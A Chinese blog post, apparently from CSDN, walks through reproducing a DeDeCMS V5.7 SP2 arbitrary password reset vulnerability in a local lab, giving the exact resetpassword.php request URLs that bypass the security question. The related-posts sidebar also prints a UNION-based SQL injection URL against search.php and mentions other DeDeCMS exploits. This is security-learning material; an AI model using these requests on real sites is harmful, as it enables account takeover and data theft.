漏洞复现,DeDeCMS织梦

最新推荐文章于 2024-04-18 17:15:00 发布
最新推荐文章于 2024-04-18 17:15:00 发布
阅读量3k 收藏 7
点赞数
分类专栏: 网络渗透 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53188113/article/details/121531449
版权

目录

一、复现环境

二、复现过程及环境

一、复现环境

PHP 5.6
DeDeCMSV5.7SP2 正式版 (2018-01-09)

二、复现过程及环境

安装 DeDeCMS
首先,利用PHPstudy安装环境

点击网站,进入后再点击创建网站,然后填写域名,可根据自己的需要来填写

回到文件夹,打开

DeDeCMS所在文件夹的uploads路径,把其下所有的文件复制到 studypro文件夹的www目录中即可

 域名/install/ 进入安装页面

 填写好基本信息

 进入网站后台,登录管理员账号

 在系统设置中开启会员功能

 

 

 然后退出管理员账号,注册会员账号,并不设置安全问题,可注册多个 

用admin可查看我注册的会员账号,我的user1的mid为2
 
接下来就是抓包啦
首先你得先有一个抓包工具BURPSUITE,点击文件夹最下方的运行薄荷.vbs
开始抓包,

域名/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=2(mid是你抓包的用户的mid,比如我的是2 )用burp抓包得到key.

域名/member/resetpassword.php?dopost=getpasswd&id=2

跳转到修改密码页面,临时验证码就是key

 然后成功修改密码

hanRFL
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Dedecms 最新版漏洞收集并复现学习
墨痕诉清风的博客
09-30 5424
在用户密码重置功能处,php存在弱类型比较,导致如果用户没有设置密保问题的情况下可以绕过验证密保问题,直接修改密码(管理员账户默认不设置密保问题)。这么一次过滤,直接粗暴的将一些特殊字符替换为空,那么我们就可以通过特殊字符绕过上面的全局文件名不能包含php字符的限制,比如文件名为。这样,由于index.php中我们可以控制返回一个输入值和这个输入值经过服务器处理后的md5值。我们可以看到当uid存在值时就会进入我们现在的代码中,当cookie中的last_vid中不存在值为空时,就会将uid值赋予过去,
DedeCMS漏洞复现
qq_52223347的博客
03-10 974
介绍 织梦CMS是集简单、健壮、灵活、开源几大特点的开源内容管理系统,目前占领了国内开源CMS的大部份市场,目前已经有超过三十万个站点正在使用织梦CMS或基于织梦CMS核心开发。 官方网站: http://www.dedecms.com/ 环境搭建 phpstudy 创建数据库 解压源码到www下 Dedecms_v5.7ps2 访问 DedeCMS/uploads/install/index.php 安装 安装完成–》登陆后台 任意文件操作漏洞复现 进到网站后台–》访问 dede/tpl.php?act
漏洞情报】复现任务
liangtaiwei的博客
12-13 2424
一、漏洞概述 织梦内容管理系统(DedeCms) [1] 以简单、实用、开源而闻名,是国内 最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统, 在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长 足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能 更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在 使用该系统。 2018 年 1 月 10 日, 锦行信息安全公众号公开了一个关于 DeDeCMS
dedeCMS V5.7 SP2后台代码执行漏洞复现(CNVD-2018-01221)
W小哥
03-03 1887
一、漏洞描述 织梦内容管理系统(Dedecms)是一款PHP开源网站管理系统。Dedecms V5.7 SP2版本中的tpl.php中存在代码执行漏洞,可以通过该漏洞在增加新标签中上传木马,获取webshell。 二、利用条件 该漏洞利用需要登录后台,并且后台的账户权限是管理员权限。 三、漏洞环境搭建 1、官方下载DeDeCMS V5.7 SP2(UTF-8),下载地址: http://www.d...
宝塔+dedecms 文件上传漏洞bypass复现
最新发布
2301_80127209的博客
04-18 682
知道,1方面要对小马进行base64编码, 另外一方面要对蚁剑进行魔改。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。1,我先找的资料,是蚁剑的绕过disable_function。可以发现, 规则,对get,post ,cookie,等方式的eval,还有base64都进行了过滤。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。千万要注意的是,这个得选择这个。
dedecms 文件上传 (CVE-2019-8933)漏洞复现
weixin_42675091的博客
09-03 3239
dedecms 文件上传 (CVE-2019-8933)
DedeCMS_v5.7其他漏洞复现
wutiangui的博客
09-12 480
其中aHR0cDovL3d3dy5iYWlkdS5jb20=是http://www.baidu.com的base64编码。管理员在添加用户购买商品的配送方式时,可能会触发存储型xss。进入后台—>会员—>配货方式设置—>增加一个配货方式。二、后台shops_delivery_存储型XSS。后台modifytmp.inc被写入了新内容。三、sys_verifies后台文件写入。用户在购买商品时会自动弹出配送方式列表。版本:5.7sp1、5.7sp2。访问后发现直接转到百度。
漏洞复现--织梦CMS_V5.7任意用户密码重置漏洞
HengMengSec的博客
08-16 1933
织梦内容管理系统(DeDeCMS)以其简单、实用、开源的特点而著名。作为国内最知名的PHP开源网站管理系统,它在多年的发展中取得了显著进步,无论在功能还是易用性方面都有长足的发展。该系统广泛应用于中小型企业门户网站、个人网站、企业和学习网站建设。在中国,DedeCMS被认为是最受欢迎的CMS系统之一。但是,最近发现该系统的一个漏洞位于member/resetpassword.php文件中。由于未对接收的参数safeanswer进行严格的类型判断,攻击者可以利用弱类型比较来绕过安全措施。
织梦CMS_V5.7任意用户密码重置漏洞复现
wutiangui的博客
09-12 812
漏洞位于member/resetpassword.php文件中,因未对传入的参数safeanswer进行严格类型检查,导致可使用弱类型比较绕过。在代码分析中,当 d o p o s t 等于 s a f e q u e s t i o n 时,通过传入的 dopost等于safequestion时,通过传入的 dopost等于safequestion时,通过传入的mid查询用户信息,判断安全问题和答案是否匹配。输入新密码,比如admin,然后登录试下,发现登录成功,数据库里查到的也是admin。
漏洞复现-tomcat-弱口令+文件上传】vulfocus/tomcat-pass-getshell
10-11 1721
【tomcat-弱口令+文件上传】
织梦漏洞利用
weixin_53210070的博客
12-14 1540
Dedecms网站建立 php打开网站,开始安装 漏洞利用原理 dedecms系统中使用了SQL语句防注入功能引了的安全警告。在自定义模模型中使用了union|sleep|benchmark|load_file|outfile之一都会引发这个警告,此外采集的内容,如果有‘union 这类语法也会出现在这个警告。解决办法就是把安全检查关掉,打开include下面的dedesql.class.php 和dedesqli.class.php,$this->...
dedecms织梦首页分页插件_hexo分页_dedecms_织梦csm_
10-03
织梦CMS默认首页文章列表是不能分页的,但是我这个网站主页做个人博客网站的,首页要用到分页,所以装了织梦首页分页插件这个插件来实现。但是装完插件后发现,首页分页URL地址是index**.html这种格式,和我原来hexo...
dedecms织梦系统短信插件.zip
11-02
dedecms织梦系统短信插件.zip】这个压缩包文件包含了用于集成到织梦Dedecms)系统的短信插件。织梦内容管理系统(Dedecms)是一款广泛使用的开源PHP网站建站系统,它为企业和个人提供了一个便捷的网站搭建平台。...
织梦dedecms转wordpress插件
10-18
织梦dedecms转wordpress插件,该插件可以把织梦数据完整的转到wordpress并保持源链接不变不影响SEO,该插件可以把织梦的,系统参数、栏目分类、栏目内容、栏目TDK、文章内容、文章自定义字段、友情链接、一起转入到...
dedecms在线订单发送邮件插件_dedecms_织梦CMS_
10-01
如图所示:dedecms在线订单发送邮件插件用途:访客在线发送信息到您预先设置的邮箱,稍加修改,即可作为订单、反馈、求职等邮件发送。解压包里有安装说明,新手不会的话可以联系站长,或者留言即可。
DedeCMS历史漏洞复现之代码执行漏洞
jojo705的博客
03-25 7972
本文介绍的漏洞虽然不是最新漏洞,但意在让初学者了解漏洞复现的基本流程。 首先了解一下什么是CMS。CMS是Content Management System的缩写,意为"内容管理系统"。内容管理系统是一种位于WEB 前端(Web 服务器)和后端办公系统或流程(内容创作、编辑)之间的软件系统。内容的创作人员、编辑人员、发布人员使用内容管理系统来提交、修改、审批、发布内容。这里指的“内容”可能包括文...
ThinkCMF+Dedecms+discuz漏洞复现
热门推荐
1ance's blog
11-13 1万+
写在前面:本文为网上下载的cms搭建的靶场环境,内含thinkCMF+dedecms+discuz!;通过对靶场的测试,对cms的漏洞进行复现。 欢迎大家点赞收藏,点点关注更好了hhhhhh 文章目录0x001 环境搭建0x002 漏洞复现0x01 弱口令0x02 任意文件上传0x03 头像上传处存在任意文件删除漏洞0x04 任意文件包含漏洞0x05 后台存在SQL注入0x06 URL重定向0x07 远程代码执行0x08 任意文件上传0x09 存储型XSS0x10 远程代码执行0x11 个人资料处存在存储型
B:DeDeCMS用户权限更改 漏洞复现
weixin_53130100的博客
12-02 2259
DeDeCMS用户权限更改:1.安装phpstduy 2安装DeDeCMS 3.漏洞复现 4漏洞影响
dedecms漏洞复现
03-28
由于 Dedecms 平台存在多个漏洞,以下是一个常见的 Dedecms 漏洞复现过程: 1. 扫描目标 Dedecms 站点,确定其版本号和漏洞类型。 2. 找到对应的漏洞利用代码,例如 Dedecms v5.7 SP2 sql注入漏洞利用代码: ``` http://www.target.com/search.php?kw=%27%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100%23 ``` 3. 将漏洞利用代码粘贴到浏览器地址栏并访问,如果出现错误信息或页面内容发生变化,则说明漏洞存在。 4. 利用漏洞进行攻击,例如获取敏感数据、添加管理员账户等。 需要注意的是,任何未经授权的攻击行为都是违法的,建议仅在合法的安全测试环境中进行漏洞复现和攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值